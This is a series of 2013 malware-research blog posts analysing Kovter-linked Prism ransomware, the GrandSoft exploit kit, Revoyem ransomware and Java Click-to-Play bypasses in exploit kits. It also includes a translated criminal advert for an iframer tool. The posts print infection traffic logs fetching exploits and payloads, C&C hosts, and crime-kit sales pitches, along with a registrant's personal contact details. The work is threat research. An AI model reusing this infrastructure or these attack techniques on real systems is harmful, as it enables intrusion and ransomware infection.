Prism themed ransomware - Kovter evolution

August 25, 2013, 12:25 pm

≫ Next: Finally ! Here is ... GrandSoft Private SploitPack !!

≪ Previous: CVE-2013-2465/CVE-2013-2471 integrating Exploit Kits -- jre7u21 CVE- jre6u45 and earlier

Prism logo ;)

I found a new (to me - it seems it's 2 weeks old) Prism Themed ransomware. Not really worth a post but could make you smile too...so here is it :

Prism Themed Ransomware - 2013-08-25
(Kovter.???)

Based on where I found it, http calls and other details, I would say it could be the same actors that were behind Kovter.

Fiddler Trace of Infection + Design Gathering

<edit1: > Checking a little more it's an evolution of Kovter Also looking at your browsing history.

History check
(against a list that is now encoded)

</edit1>

Ransomware C&C :
94.242.206.71

5577 | 94.242.192.0/18 | ROOT | LU | ROOT.LU | ROOT SA

zipwog.biz
Registrant Name: Vladislav Krasnov
Registrant Address1: Kahovskaya st. 31
Registrant City: Perm
Registrant State/Province: Permskaya oblast
Registrant Postal Code: 614109
Registrant Phone Number: +7.9145023291
Registrant Email: krvansed@rambler.ru

<edit2 2013-08-26>
After Circl action their failover Reverse Proxy in Germany is being used:
83.133.110.32
13237 | 83.133.0.0/16 | LAMBDANET | DE | GREATNET.DE | GREATNET NEW MEDIA.
zigwog.info
</edit2>
File:
e1988e7512bb18dc0e3ed946ca466d0f - Sample here (OwnCloud via Goo.gl)
407886c0ad30f4152428e7c99536bbaa

↧

Finally ! Here is ... GrandSoft Private SploitPack !!

September 8, 2013, 8:14 pm

≫ Next: Revoyem goes international - shocking distribution....

≪ Previous: Prism themed ransomware - Kovter evolution

(not the logo - just for Thumbnail)

That's a lot of exclamation mark but when you can name something after wondering for months what it was, you want to share the !!!

I've heard of GrandSoft and from what we called Stamp EK/SofosFO since more than a year. And yes....we can link both ! I know it for sure since end of June but can only write about it now cause the pack coder took some vacation...(no way to land on it - it's rent only)

StampEK/SofosFO == GrandSoft !

The first time I wrote about it was one year ago, when a dictionnary was introduced to build the landing pages.
That episode show how important/difficult is to give proper name to threats to ensure everyone is talking about the exact same thing.
No name was really set in the community for that pack. Been told it was NeoSploit, then that for sure was not Neosploit (cause Neosploit was something else...that in fact ends up being Fiesta.....).

Author of this pack is, from time to time, writing feelings/messages in landing and jar file of his pack. Here are some :

Image : Courtesy of Sophos
Read: Sophos sucks? Being insulted by malware authors can be the best reward

GrandSoft Jar file few days after the CVE-2013-0422 0day
Maybe coincidence but....a Class is using my real firstname (yes...not that hard to find - and Thanks (you know who you are) for pointing that to me)
and a message to Microsoft team

GrandSoft landing 2013-03-11

GrandSoft Landing 2013-04-15

Advert :
On underground since March 2012.

Piece of Original Advert

Original text of the Advert
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

Еcть cвoбoдныe мecтa! ОГРАНИЧЕННО!!!

Прoбив чуть вышe урoвня пo cвязкaм нa пaблик cплoйтaх.
Дoмeны нaши, ИПы нaши, ceрвaк нaш.
От вac трeбуeтcя тoлькo oплaтa и cлaть трaффик.
Минуcы:
- Сoфт в cтaдии бeттa. (Бывaют трaблы нeзнaчитeльныe, тeм нe мeнee рaбoтa нaд coфтoм вeдeтcя пocтoяннo!)
Плюcы:
+ Свoи дoмeны (Пocтoянныe cмeны дoмeнoв! вceгдa чиcтo пo АВ!)
+ Свoи ceтки IP's (Тaк жe пocтoяннaя cмeня IP'oв! Чуть чтo, тaк cрaзу мeняeм IP. В тoм чиcлe нeпaлит и cпaмхaуc!)
+ Пocтoянный крипт (Кoнeчнo кaк у вceх бывaeт чтo пaлитcя. Нo мы рaбoтaeм и чиcтим, ecли и пaлитcя, тo oбычнo 2-3 АВ нe бoльшe, a чиcтитcя oт 1 чaca дo 3-4)
+ Крипты прoвeряютcя нa виртуaлкaх (Чeкaли, вce плaтныe ceрвиcы АВ cкaнeрoв прoбoвaли, ни oдин нe пoкaзывaл aдeквaтнoгo рeзультaтa пo чиcтoтe , пo ceрвиcу якoбы cплoйты чиcтыe, a нa дeлe пaлятcя тeм или иным aвeрoм, пoтoму прoвeряeм пoпулярныe АВ нa виртуaлкaх!)
+ Огрaничeннo чиcлo мecт (В нaшeй cфeрe чeм бoльшe кoл-вo иcпoльзующих прoдукт клиeнтoв, тeм мeньшe кaчecтвo, кoнкрeнтo пaлятьcя быcтрee ипы, дoмeны, cплoйты , пoтoму чиcлo клиeнтoв oгрaничeннo!)
+ Вoзмoжнocть грузить dll.
+ Удoбнaя рaбoтa: aвтoaпдeйт eхe, aвтoмaтичecкий eхe aв чeкeр, aв cвязкa чeкeр, aвтo выдaчa линкoв, джaбeр бoт нoтифкaтoр и т.д.

Прoшу oбрaтить внимaниe, у нac нecкoлькo инoй тaрифный рacчeт, тaриф рaccчитывaeтcя из cкoрocти пoтoкa трaффикa в чac.
Тeкущиe тaрифы: (пoтoк трaфa в чac = нeдeля / мecяц).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Лимит нa кoл-вo хocтoв (Лимит в чac!). Пo вoзмoжнocти фильтруйтe нe уникoв, нe виднoвc, хрoм , бoтoв и прoчий шлaк дo oтcылa нa cвязку!

Кoнтaкты:
GrandSoft@default.rs
GrandSoft@xmpp.jp
GrandSoft@thiessen.it
* Оcнoвнoй кoнтaкт пeрвый, ocтaльныe рeзeрвныe.
* ОТR ecть.

PS: С иcтeричecкими, нeрвными, нeaдeквaтными личнocтями нe рaбoтaю. Увaжaйтe ceбя.
Тaк жe мoгу oткaзaть в рaбoтe бeз oбъяcнeния причин.
PSS: Нe уcтрaивaeт цeнa? Сoрри, вaм cтoит oбрaтитьcя к кoнкурeнтaм. Дaнный вoпрoc нe oбcуждaeтcя, флуд пo нeму тaк жe нe имeeт cмыcлa.
PS кoнкурeнтaм: Пoвышeнный прoбив дocтигaeтcя зa cчeт тoгo, чтo юзaютcя тoлькo чиcтыe дoмeны и ипы, и cплoйты пeрeкриптoвaютcя пo нecкoльку рaз зa дeнь, пoтoму coвeтую вaм нe трaтить cвoe врeмя нa рaзбoр мoeй выдaчи, ничeгo нoвoгo вы тaм нe нaйдeтe, cплoйты тaкиe жe кaк и у вac: 2 джaвa, пдф пaк (eмaл,кoллaб,ньюплeeр,либтиф). Ничeгo cвeрхecтecтвeннoгo , в cвязкe нeт и нe будeт никaких зeрoдeй cплoйтoв.

I work only with Russian people!
------------------------------------------
Translated by Malwageddon (Thanks !) as :
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

We got some places available! LIMITED!!!

Callback rate is slightly better than the one using EKs with publicly available exploits.
We provide domain names, IPs and the server.
You only need to pay and send traffic.

Disadvantages:
- Software is in BETA. (We do experience some difficulties sometimes, but the software is under constant development!)

Advantages:
+ Our domain names (Constantly changing domains! Always AV clean!)
+ Our IP ranges (Also, constantly changing IP addresses. If we find anything suspicious we instantly change the IP. We also stay Spamhuas free.)
+ Constantly encrypting (Of course it happens and the software starts being detected. We work on it and clean it up. Even when it's detected it's 2-3 AVs not more and we clean it up in 1 hour - 3-4 hours most)
+ We use VMs to test new crypts (Checked using all commercial AV scanners - none of them shows an appropriate result though. According to some services the exploits are clean, but in reality are being detected, so we test most popular AVs using VMs )
+ Limited number of places (In our business, the more people using a product the lesser quality you get - IPs, domain names get blacklisted, exploits detected and so on. That's why we limit the number of client!)
+ DLL loading is supported.
+ Easy to use: EXE auto-update, EXE AV auto-checker, EK AV checker, auto links issue, bot notification supports Jabber, etc.

Please note, we have slightly different tariff pricing - it depends on the incoming traffic per hour.
Current pricing: (incoming traffic per hour = week / month).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Amount of hosts limited (per hour!). If possible filter non-unique, non Windows, Chrome, bots and other rubbish prior directing traffic to EK!

Contacts:
GrandSoft@default.rs
GrandSoft@xmpp.jp
GrandSoft@thiessen.it
* First is the main contact - the rest are reserves.
* OTR is present.

PS: I do not work with hysterical, nervous and senseless people! Respect yourselves.
I can also terminate your service with no reason given.
PSS: Don't like the price? Sorry, ask competitors. I do not negotiate over the prices, so spare yours and mine time.
PS for competitors: Better callback is achieved through only using clean IPs and domain names, also exploits are re-encrypted a few times a day, so spare your time analysing my setup - you won't find anything new. I use the same exploit as you do: 2 Java, PDF pack(email, collab, newplayer, libtiff). There is no 0-days or anything extraordinary and will never be.

I work only with Russian people!
------------------------------------------

I don't know exactly how the admin panel looks like, but here are some traffer/seller page :

GrandSoft Traffer/Seller Page - End of 2012

GrandSoft - Begining of January (before CVE-2013-0422)

Grandsoft Traffer/Seller Page - May 2013

I'll make the First pass with (obviously) the latest java6 publicly available (hot topic...) :
CVE-2013-2463 :

CVE-2013-2463 successful pass on Win7 x64 - jre16u45

GET http://accommodation.romancenu .org/swallowing_cofounder.html

200 OK (text/html)Pastebin

Creation of the next call URL pattern based on Adobe Reader plugin version
(to fire the bullet that fits the hole in the victim's Adobe Reader version )

GET http://accommodation.romancenu .org/cs9swQXJGQmKXGKQ/11.0./wonder.php5
200 OK (text/html)

Pdf not (yet..?) exploitable...java bullet only is fired !

GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive) 4c477d6d1bfd02b7ff2e6ab7afdf96db

Obfuscated import

Piece of CVE-2013-2463 in GrandSoft jar 2013-09-08

Hex-encoded class acting as downloader
Thanks Chris Wakelin for help!

GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive)

GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/2886/4911345
200 OK (application/java-archive) once decoded : 3d1e04ebbb372ca37f87d89b4884871c (Out of Scope Payload. If anyone looks at it, feedback welcome ! :) - C&C : liliputttt8888.com - 70.122.201.25 - POST /ipv.php & /html2/ )

CVE-2013-0188 :

CVE-2013-0188 successful path in GrandSoft EK

GET http://xsbqlrm.sole.kosher-qscessationztad.biz/bally_affluent_victim
200 OK (text/html)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/yfxswQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/b3e82oiiwQrgograoEawpE4roDewp/357925970/comfortable.pdf
200 OK (application/pdf) 79a73625ffd620772d28ddf540b189ff ( I may edit later to study that one more in details)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/5toiiwQrgograoEawpE4roDewp/337606552/6933484
200 OK (application/pdf) once decoded 76a3b1f6c3635ae9dba3745701a0faf7 (quite surely repack of previous one. Same behaviour)

CVE-2013-0422 :

Double shot by CVE-2013-0422 & CVE-2010-0188 in GrandSoft

Those pattern are for a double shot...otherwise 2nd URL may contains null (no Adobe Reader) or other version of Adobe Reader

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/labels.php
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/dmwQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/43znoiiwwip4graoEawpE4roEwQG/357925970/comfortable.pdf
200 OK (application/pdf)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive) 790ab433e52423e91779876833660033

Encoded import Class name in CVE-2013-0422 jar in GrandSoft

Decoding variable using Malzilla
(after tiny Java to javascript conversion)
Note the : antimalware(pizdainxuyHero

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive)

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/0886/4268355
200 OK (application/java-archive) once decoded : 3d1e04ebbb372ca37f87d89b4884871c

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/f8wwoiiwwip4graoEawpE4roEwQG/395526046/6096281
200 OK (application/pdf)

CVE-2011-3544 :
Why ? Cause last CVEs seems to crash with JRE6 <= 18. (Thanks a lot you know who you are)

CVE-2011-3544 Successfull pass in GrandSoft

GET http://experiencing.electingipzxrosstbie .in/invalid
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/5mb6ewQXJGQmKXGKQ/null/wonder.php5
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive) 4e17af9e6d7438544aa06918df811dd5

Piece of CVE-2011-3544 in GrandSoft jar

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/com.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/edu.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/net.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/org.class
404 Not Found (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/1886/7678063
200 OK (application/java-archive) decoded 76a3b1f6c3635ae9dba3745701a0faf7

Exploitation Graph :

Disclaimer : didn't spent a lot of time on PDF so don't put to much credit to the work here.

The java part need some refinement (versions)

Fast (uncomplete) Exploitation Graph for GrandSoft 2013-09-09

Files : Here (Owncloud via goo.gl) (5 fiddler (don't trust the referrer - I often fake it) - 1 payload - 3 jar - 2 pdf)

Ransomware Spam Pages on Github, Sourceforge, Others - Chris Boyd - 2013-02-07 - GFI

Stamp EK (aka SofosFO) now showing "Blackhole 2.0 Like" landing pages - 2012-10-18

↧

Revoyem goes international - shocking distribution....

September 12, 2013, 2:00 pm

≫ Next: jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits

≪ Previous: Finally ! Here is ... GrandSoft Private SploitPack !!

The dirty Revoyem (aka DirtyDecrypt) ransomware seems to have appeared at the end of March 2013 and was targeting Germany and Great Britain only. It looks like they are now going international and are really aggressive in the way they distribute it.

I already mentioned the "double kick the victim" way of distribution of some Ransomware. I saw that in action again today. From a Porn website, you are redirected by a TrafficHolder malvert to a Child Porn themed page (impact 1 : images are highly disturbing here) from which you get infected via Styx which drop you a Ransomware locking your computer displaying disturbing images and telling you just viewed illegal content (impact 2 - amplified cause it's true...you just viewed illegal content even if you've been driven there against your will).

1: Bring the victim to illegal content.
2 : Infect and lock the victim for seeing illegal content

Malwr.com analysis (that i can now link here - thanks Claudio for redacting the design successfully captured)

Nothing really new here but I think it's better to know which countries are targeted.

I made a gathering session and here is the list I saw :

AT, BE, CA, CZ, DE, DK, ES, FR, GB, IT, NL, PL, SE, TR, US

Note : there are quite surely more.

I will only display the US version and banner for countries but blurred full design are available in the zip in case one may want to use for awareness raising purpose.

Revoyem US 2013-09-12

AT :

Revoyem AT Banner 2013-09-12

BE :

Revoyem BE Banner 2013-09-12

CA :

Revoyem CA Banner 2013-09-12

CZ :

Revoyem CZ Banner 2013-09-12

DE :

Revoyem DE Banner 2013-09-12

DK :

Revoyem DK Banner 2013-09-12

ES :

Revoyem ES Banner 2013-09-12

FR :

Revoyem FR Banner 2013-09-12

GB :

Revoyem GB Banner 2013-09-12

IT :

Revoyem IT Banner 2013-09-12

NL :

Revoyem NL Banner 2013-09-12

PL :

Revoyem PL Banner 2013-09-12

SE :

Revoyem SE Banner 2013-09-12

TR :

Revoyem TR Banner 2013-09-12

<edit1:>
More campaigns described by Malekal here : http://www.malekal.com/2013/08/08/dirdecrypt-malvertising-trafficholder/
Some other domains likely involved in the C&C part via Dhia Mahjoub </edit1>

Files : In the zip : Full blurred designed - Sample - Fiddler : Here (owncloud via goo.gl)

↧

jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits

September 19, 2013, 4:05 pm

≫ Next: Cookie-Bomb : The "Северная Сказка" Iframer way

≪ Previous: Revoyem goes international - shocking distribution....

A new variant of a "Kore-ish" Cool EK appeared few days ago.
Yes...it's difficult to follow the EK fast moving landscape...No payload in the jar for that one.

Some instances of this "Cool EK"
in URLQuery

I faced it often where I used to see Kore (aka Sibhost) Exploit Kit.
It is also used to spread the Urausy Ransomware and FakeAV (so... BestAV stuff)

All jar found there were identical as those in Blackhole. Till today.

CVE-2013-2460 + Click2Play Bypass :

That CVE was already in use in Private Exploit Pack but it was noisy (Imposition then made it optional )

CVE-2013-2460 successfull path in Cool EK (Kore-ish)
Click2Play Bypass inside 2013-09-20

GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)

Key Piece of the landing

GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)

GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)

GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)

GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)

----- Off Topic ----
Payload is rotating fast (2 more md5) :
b56348220f83ad9db50cb5beb564148b
64ef8f2cb215af4b2fbcb51cadfcc025

Urauy Ransomware - DE design - 2013-09-20
(BestAV soft 2)

Note : on another thread you can get a FakeAV

Payload call with bigger charge

9d8d3094849f685859945140721aafb1
7fb9423c4bdf7080137745e81ba38362
13e24b552ea472146495ac8a33cca975

Other payload from this "Kore-ish" Cool EK
(BestAV Soft1)

-------------------

So what's that Click2Play bypass ?

Quite surely : http://seclists.org/bugtraq/2013/Jul/41
2013-06-18 - Vulnerability Fixed in Java 7u25

Yes :

Warning with jre7u25
(and as CVE-2013-2460 is patch too...clicking on run there won't put you at risk)

It's the first time I see that.
5 days ago :

EKs vs jre7u21 : http://t.co/jCkdtnp7NW
— kafeine (@kafeine) September 15, 2013

Who sold it ?
??

No download link for now. Yes it will spread fast anyway.
It's easy to get rid of all these Exploit Kits : update !

<edit1 2013-09-21>
Already in Sakura...surely cause of that blog post. It's often difficult to decide how much you can write about something.

Sakura CVE-2013-2460 & Click2Play Bypass :

Sakura featuring CVE-2013-2460 & Click2Play bypass

2013-09-21

GET http://[redacted]253 .pw:8509/me.php
200 OK (text/html)

Precision Strike
new Click2Play bypass for 21 version

Jnlp call

GET http://[redacted] .pw:8509/[redacted].ee
200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460

Piece of CVE-2013-2460 in Sakura Jar
2013-09-21

GET http://[redacted] .pw:8509/bodystarswild.ee

200 OK (application/java-archive)

GET http://[redacted] .pw:8509/2889.ld

200 OK (application/octet-stream) Once decoded : 5fba8226303967ccfd27ea8710a8b99d I think it's a Smokebot

----- Off Topic ----

C&C Calls :

mexstat757.com POST /satep757/index.php
mexstat220.pw GET /setex/sev57.exe

mexstat220.pw GET /setex/pm555.exe

etc...

46.165.201.27
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH

It's the same guys than those who were behind this one year old post :

From Sakura to Reveton via Smoke Bot - Or a Botnet Distribution of Reveton 2012-09-12

Since then Smoke Bot is now encrypting its network calls.

Analysis by Joe Sandbox Cloud

----------------------

</edit1>
<edit2: 2013-09-23>
Nuclear Pack : CVE-2013-2460 + Click2Play bypass

Announced Underground :
"добавлен новы exploit, пробив увеличен. работает тихо и не палится" Nuclear
which means something like:
"New exploit added, breaking rate increased, works silently and scorched"

CVE-2013-2460 with no security prompt successful path in Nuclear Pack
2013-09-23

GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html
200 OK (text/html)

Precision Strike (Thanks @EKWatcher )

jnlp call in Nuclear Pack
After Deobfuscation (Thanks @EKWatcher )

GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)

GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java) e03455403f226b23be42b30733a26101

Piece of CVE-2013-2460 in Nuclear Pack
2013-09-23

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2
200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2
200 OK (application/octet-stream)

----------- Out of Topic -----------
C&C :
185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.
for instance :
POST /mBj7cjhH/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: halifaxkilo.com

Analysis by Joe Sandbox Cloud
------------------------------------
</edit2>

↧

Cookie-Bomb : The "Северная Сказка" Iframer way

September 21, 2013, 6:15 am

≫ Next: Flimrans Affiliate : Borracho

≪ Previous: jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits

For Thumbnail
(from turn.com)

First mention of what they named "CookieBomb" code injection attack come from @MalwareMustDie in this post.

#MalwareMustDie NEW #BLOG: Proof of Concept of "CookieBomb" attack http://t.co/Q1eh7j3KUx pic.twitter.com/fN1L5CnsXX
— MalwareMustDie, NPO (@MalwareMustDie) July 17, 2013

I won't explain here how i know which product is behind this but know that for instance Reveton team used it (or at least one traffer for Reveton) as mentionned by @Malekal_morte

[en] Reveton go now by hacked website http://t.co/l4GHmMI0cY #malware #infosec
— Malekal's site (@malekal_morte) August 12, 2013

The product behind the CookieBomb : Ифреймер "Северная Сказка"

"Snip Shot" of the Advert

Original text of the advert :
--------------------------------------------
Ифреймер "Северная Сказка"

Добрый день,

Меня зовут Пётр Севера, и я с гордостью представляю всем желающим свой новый продукт - ифреймер "Северная Сказка". Разработка его до текущего состояния заняла несколько лет, и можно с уверенностью утверждать, что легендарная кнопка "Бабло" теперь доступна всем желающим. Ифреймер уже используют десятки людей из моего ближайшего окружения, и от всех без исключения он заслужил самые высокие оценки. Обычно, софт такого уровня вообще не доступен для широкой публики, и тихо годами приносит сверхприбыли избранным. Многие из тех, кто использует "Северную Сказку" сейчас, под разными предлогами отговаривали меня от начала продаж широкому кругу лиц. Но, посоветовавшись с партнерами по этому проекту, хорошенько взвесив все плюсы и минусы, я осознанно пошел на этот шаг.

Что же такое ифреймер "Северная Сказка"? Как любит говорить главный разработчик — это не просто ифреймер, это целая операционная система. Итак, "Северная Сказка" — это многофункциональный серверный софт, управление которым происходит через удобную веб-панель.

Основной функционал:
- многопоточный ифрейминг ваших фтп и вебшеллов — мы умеем работать со всеми популярными CMS (более трехсот), и вставляем ваш код самым оптимальным способом в любые виды скриптов. Вы можете быть уверены, мы не испортим верстку ни одной страницы, и вы получите максимум траффика с каждого аккаунта!
- приватные алгоритмы автоматической генерации и криптования ифрейм кода.
- проверка на наличие SSH доступа у всех аккаунтов фтп. Примерно 15-20% фтп имеют доступ по SSH, также можно чекать майл+пасс базы на наличие доступов по фтп или SSH.
- все аккаунты SSH проверяются нашими серверными эксплоитами на получение рута. С 10к аккаунтов SSH вы можете получить в районе 500 рутовых доступов к серверам! На руты устанавливается простой бэкдор для повышения прав при последующем доступе. Руткит в разработке.
- гибко настраиваемая система проверки на детекты АВ как кода ифрейма, так и доменов/ip доров, использующая все известные антивирусы. При детектах АВ автоматически перекриптовывается и заливается на аккаунты новый чистый код.
- заливка любых пользовательских скриптов с проверкой на работоспособность, заливка шеллов и массовое выполнение команд на них: ифрейминг/очистка, eval(), system(), информация о системе, ддос, и др.
- все действия с аккаунтами выполняются через socks-прокси. В качестве socks-прокси используюся SSH-туннели, поднимаемые на обнаруженных доступах SSH, или на аккаунтах, загруженных пользователем вручную.
- все поднятые на сервере socks-прокси можно использовать как на своём компьютере, так и на любых других разрешённых IP-адресах, таким образом обеспечивая себе дополнительную безопасность и анонимность в сети Интернет.
- встроенная TDS (гибкая система распределения и учета траффика), выдерживающая высокие нагрузки на уровне Sutra TDS.
- отключаемые jabber-уведомления
- и многое, многое другое.

Я отдаю себе отчет, что фтп аккаунты - это очень приватная вещь, и мы приложили максимум усилий, чтобы кроме вас никто не получил к ним доступ. Все исходные коды зашифрованы, все аккаунты в базе криптуются нашим собственным алгоритмом не поддающемуся брутфорсу. Ваш пароль используется в качестве ключа шифрования, в случае утери пароля даже мы не сможем расшифровать аккаунты из базы. Установка админки производится в truecrypt контейнер.
Всё это создает достаточную защиту ваших данных в случае любых непредвиденных обстоятельств.

Поддержка пользователей осуществляется почти 24 часа в сутки, 7 дней в неделю, несколькими специалистами. Софт постоянно улучшается, добавляется функционал по пожеланиям клиентов.

Версии софта:
Софт предоставляется в двух комплектациях - "Lite" и "Pro".
Версия Lite включает в себя базовый функционал для обработки FTP аккаунтов - фреймер FTP, TDS, проверка на SSH доступ, автоматика АВ - полноценный инструмент для работы с FTP.
Версия Pro, помимо функционала версии Lite, имеет дополнительные возможности - заливка скриптов на аккаунты, работа с веб-шеллами, проверка получения рута на SSH, инжектор ифрейма в SWF файлы, и другие.
В версию Lite новый функционал добавляться не будет, в обновлениях будут только исправления найденных ошибок. Новые фичи добавляются только в версию Pro.

Ценовая политика:
Лицензия на использование софта стоит 1500 долларов в месяц при покупке Pro версии, и 1000 долларов при покупке Lite версии. При оплате за год вперед скидка 50% (9000$ за Pro, 6000$ за Lite)
К этой цене необходимо прибавить стоимость сервера, вы можете заказать его у нас (цены начинаются от 150 долларов в месяц), или предоставить свой собственный сервер.

Видео о возможностях проекта: http://www.youtube .com/watch?v=DvDNob628F0

Мы принимаем Webmoney, Liberty Reserve, Perfect Money, Bitcoin
Зарегистрироваться и оплатить можно в автоматическом режиме на нашем сайте: https://sevska .com

Контакты(jabber):
Менеджер: manager@jabber.cx (поддержка продаж, заказ услуг, общие вопросы)
Саппорт: 31337@libpwn.so (тех. проблемы, администрирование серверов)

ЗЫ. Кроме этого напоминаю всем желающим, что по прежнему работает моя приватная партнерка по выкупу загрузок, даю ехе и стату, гружу только сокс, ни на чем не сказывается, можно паралельно с чем угодно грузить, по поводу продажи загрузок стучите мне в жабу jabber@honese.com

С уважением,
Пётр Севера
__________________
Jabber(XMPP): jabber @ honese.com
ICQ: 104967
--------------------------------------------
Translate by @Malwageddon -Thanks !
--------------------------------------------

Iframer "Tale of the North"

Good day,

My name is Petr Severa and I'm proud to present you my new product - IFRAMEr "Tale of the North". We spent a few years developing and improving this product and I can truly say - the legendary 'Cash' button is now available to everyone. The IFRAMEr is being used by a number of trusted people already and the feedback I receive is highly positive. Normally, the software of this kind is not publicly available and only used by a few chosen ones. Many who use "Tale of the North" already, tried to talk me out of going public with it, but after talking to other project partners and discussing all the pros and cons I've decided to do just that.

So, what is "Tale of the North"? As our lead developer likes to refer to it - it's not just an IFRAMEr, it's an operation system. So, "Tale of the North" is a multifunctional server software with easy to use control panel.

Main functions:
- multithreaded iframeing of your FTP and web shells - we can work with all popular CMS (over 300) and can insert your code into any script types. Don't worry, we won't screw your page assembly process and you will receive maximum traffic from your every account!
- private auto-generation and encryption algorithms for IFRAMEr code.
- SSH access check for all FTP accounts. Approximately, 15-20% of FTP have SSH access, also it's possible to check mail+pass databases for presence of FTP or SSH access.
- possibility of getting 'root' on all SSH accounts is checked by our server-side exploits. Out of 10K accounts you can get about 500 with server root access! Simple backdoor is installed for all 'root's to elevate the rights for consequent access. Proper rootkit is in development.
- IFRAMEr code AV detections checking system with flexible settings, also checks domain names and IPs - using all known anti-virus products. If the code is being detected it's automatically re-encrypted and uploaded to accounts.
- support for user custom scripts upload with execution check, shell upload with support for mass commands execution: iframing/cleaning, eval(), system(), OS details, DDoS, etc.
- any account actions are done through socks-proxy. SSH-tunnels are used for socks-proxy - compromised SSH or user manually specified servers are used.
- all socks-proxy available on the server can either be used from your PC or any other allowed IPs providing you with additional security and anonymity on the Internet.
- built-in TDS(flexible Traffic Distribution System), capable of handling big loads on par with Sutra TDS.
- configurable jabber-notifications
- and more, and more other features.

I understand that FTP accounts are very private things and we applied maximum effort to protect them. All source code is encrypted, all accounts are stored encrypted in DB using our own brute-force-proof algorithm. Your password is used as the encryption key and if it's lost even us can't decrypt your account details from the database. Admin panel is installed into TrueCrypt container. All of it combined creates a good protection for your data in any unforeseen situations.

Customer support is available almost 24/7 with a few specialists ready to answer your query. Software is constantly improved, new features can be added as per customer request.

Software versions:
Software comes in two versions - "Lite" and "Pro".
Lite version includes base functions for FTP accounts processing - FTP framer, TDS, SSH access check, AV automation - complete toolbox for working with FTP.
Pro version includes all the features available in Lite and some additional ones - script upload to accounts, web-shell interface, SSH 'root' check, iframe injector for SWF files, and other features.
Lite version will never be added any new functionality, updates will include only bug fixes. New features will be added to Pro version only.

Prices:
Licence to use the software costs $1500 a month for Pro version and $1000 for Lite. 50% discount is offered when purchasing 12 months (9000$ for Pro, 6000$ for Lite)
You'll have to add the cost of a server to this price. You can either buy it from us(prices start at $150 per month) or supply your own server.

Video featuring this project: http://www.youtube
.com/watch?v=DvDNob628F0

We accept Webmoney, Liberty Reserve, Perfect Money, Bitcoin
You can register and pay on our website: https://sevska
.com

Contacts(jabber):
Manager: manager@jabber.cx (sales support, service requests, common questions)
Support: 31337@libpwn.so (technical issues, servers administration)

